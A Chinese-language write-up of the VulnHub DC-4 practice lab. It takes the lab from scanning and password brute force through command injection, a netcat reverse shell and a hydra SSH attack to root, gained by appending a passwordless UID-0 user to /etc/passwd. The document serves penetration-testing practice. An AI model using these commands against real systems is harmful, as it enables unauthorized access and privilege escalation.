渗透实战-vulnhub-DC-4

信息收集

主机发现

┌──(root㉿kali)-[~]
└─ arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:68:c5:69, IPv4: 192.168.48.128
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.48.1	00:50:56:c0:00:08	VMware, Inc.
192.168.48.2	00:50:56:e1:fd:22	VMware, Inc.
192.168.48.143	00:0c:29:fd:6b:a3	VMware, Inc.
192.168.48.254	00:50:56:f1:d4:d7	VMware, Inc.

目标主机IP：192.168.48.143

端口扫描

┌──(root㉿kali)-[~]
└─ nmap -sC -sV -p- 192.168.48.143
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-15 11:52 CST
Nmap scan report for 192.168.48.143
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
MAC Address: 00:0C:29:FD:6B:A3 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

开放端口和服务：22端口（ssh）、80端口（http）

http服务：nginx（版本：1.15.10）

系统信息：Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.48.143/
Target: http://192.168.48.143/

[12:05:55] Starting: 
[12:06:11] 302 -  704B  - /command.php  ->  index.php
[12:06:12] 301 -  170B  - /css  ->  http://192.168.48.143/css/
[12:06:17] 301 -  170B  - /images  ->  http://192.168.48.143/images/
[12:06:17] 403 -  556B  - /images/
[12:06:17] 200 -  506B  - /index.php
[12:06:17] 403 -   15B  - /index.pHp
[12:06:19] 302 -  206B  - /login.php  ->  index.php
[12:06:20] 302 -  163B  - /logout.php  ->  index.php

Task Completed

没看出啥有用的

找漏洞

一把梭

访问目标主机80端口

先用sqlmap一把梭

把burp抓包的POST数据保存在post.txt文件中，然后开始梭哈。

┌──(root㉿kali)-[~/桌面/DC-4]
└─ sqlmap -r post.txt --dbs

[12:40:40] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

OK，兄弟们，一眼顶正，鉴定为寄。

密码爆破

查完资料回来了，下面是利用burp进行密码爆破。

既然是登录，那用户名肯定用admin

抓包发送到intruder模块

只用爆破password就行了，所以设置爆破模式：“Sniper”，设置爆破点password

然后，添加字典，根据网上的，可以用**/usr/share/john/password.lst**，然后开始爆破。

最后爆破出来密码是happy

讨厌密码爆破，完全就是看字典的丰富准确程度，没有happy这个字典还真就搞不出来了

命令注入

登录进去逛一逛

运行命令是吧，有点兴奋，抓包看看

wc，改radio参数为pwd试试

起飞！

权限还挺高。

getshell

用nc反弹一个控制台试试

这里注意加参数**-e /bin/bash**，我们要让我们的命令运行在bash下，获得完整的访问权限

┌──(root㉿kali)-[~]
└─ nc -lvp 5555
listening on [any] 5555 ...
192.168.48.143: inverse host lookup failed: Unknown host
connect to [192.168.48.128] from (UNKNOWN) [192.168.48.143] 39940
ls
command.php
css
images
index.php
login.php
logout.php

uname -a
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686 GNU/Linux

提权

本来是用searchsploit找到一个Debian 4.9.30的漏洞的，但是之后查了半天不知道咋利用

，就只能在网上找找其他思路了。

┌──(root㉿kali)-[~/桌面/DC-4]
└─ searchsploit Debian 4.9.30
Exploits: No Results
Shellcodes: No Results
---------------------------------------------------------------------- ---------------------------------
 Paper Title                                                          |  Path
---------------------------------------------------------------------- ---------------------------------
Debian < 5.0.6 / Ubuntu < 10.04 - Webshell Remote Root Exploit        | english/15311-debian--5.0.6--ubu
---------------------------------------------------------------------- ---------------------------------

查了下，害，又是密码爆破

/home/jim目录下有一个密码文件old-passwords.bak

cd home

ls
charles
jim
sam

cd jim

ls
backups
mbox
test.sh

cd backups

ls
old-passwords.bak

cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
.......

然后利用hydra爆破ssh的密码

先把old-passwords.bak的文件内容复制到本地保存为passwd.txt，然后把jim当做用户名进行爆破

┌──(root㉿kali)-[~/桌面/DC-4]
└─ hydra -l jim -P password.txt 192.168.48.143 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-16 12:46:14
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 253 login tries (l:1/p:253), ~16 tries per task
[DATA] attacking ssh://192.168.48.143:22/
[STATUS] 96.00 tries/min, 96 tries in 00:01h, 165 to do in 00:02h, 8 active
[STATUS] 72.00 tries/min, 216 tries in 00:03h, 45 to do in 00:01h, 8 active
[22][ssh] host: 192.168.48.143   login: jim   password: jibril04

得到ssh用户jim的密码为jibril04

尝试ssh登录

┌──(root㉿kali)-[~/桌面/DC-4]
└─# ssh jim@192.168.48.143
jim@192.168.48.143's password: 
Permission denied, please try again.
jim@192.168.48.143's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
#提示我又邮件？？？
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100

登录成功，还提示我有一封邮件

先看看有没有sudo的权限

jim@dc-4:/etc$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for jim: 
Sorry, user jim may not run sudo on dc-4.

OK，去看看那个邮件有没有转机。

jim@dc-4:/usr$ cd /var/mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
	(envelope-from <charles@dc-4>)
	id 1hCjIX-0000kO-Qt
	for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
#我今天下班后要去度假，所以老板让我把密码给予你，以防万一。

Password is:  ^xHhA&hvim0y
#ok,得到charles的密码

See ya,
Charles

更改用户到charles

jim@dc-4:/var/mail$ su Charles
No passwd entry for user 'Charles'
jim@dc-4:/var/mail$ ls /home
charles  jim  sam
jim@dc-4:/var/mail$ su charles
Password: 
charles@dc-4:/var/mail$ 

看看sudo权限

charles@dc-4:/var/mail$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

试试这个teehee是咋回事

charles@dc-4:/var/mail$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

charles@dc-4:~$ sudo teehee  -a 1.txt
23
23
11232
11232
1231
1231
charles@dc-4:~$ ls
1.txt
charles@dc-4:~$ cat 1.txt
23
11232
1231
charles@dc-4:~$ sudo teehee 1.txt 
1
1
2
2
3
3
charles@dc-4:~$ cat 1.txt 
1
2
3

teehee可以将输入追加到文件里面，可以不覆盖源文件。

试试改写**/etc/passwd**

• 第一个字段为：用户名名称
• 第二字段为：密码表示，但是不是真正的密码，密码是在另一个文件当中，在早期的unix中，这里保存的就是真正的加密后的密码字符串
• 第三个字段为：UID，也就是用户的ID
• 第四字段为：GID，也称为用户的组ID
• 第五个字段为：用户的说明
• 第六个字段为：用户的家目录
• 第七个字段为：shell,也可以理解为用户登录之后所拥有的权限

charles@dc-4:/etc$ echo "woqv::0:0:::/bin/bash"|sudo teehee -a passwd
woqv::0:0:::/bin/bash
charles@dc-4:/etc$ su woqv
root@dc-4:/etc# whoami
root
root@dc-4:/etc# cd /root
root@dc-4:/root# ls
flag.txt
root@dc-4:/root# cat flag.txt 



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

ok，完美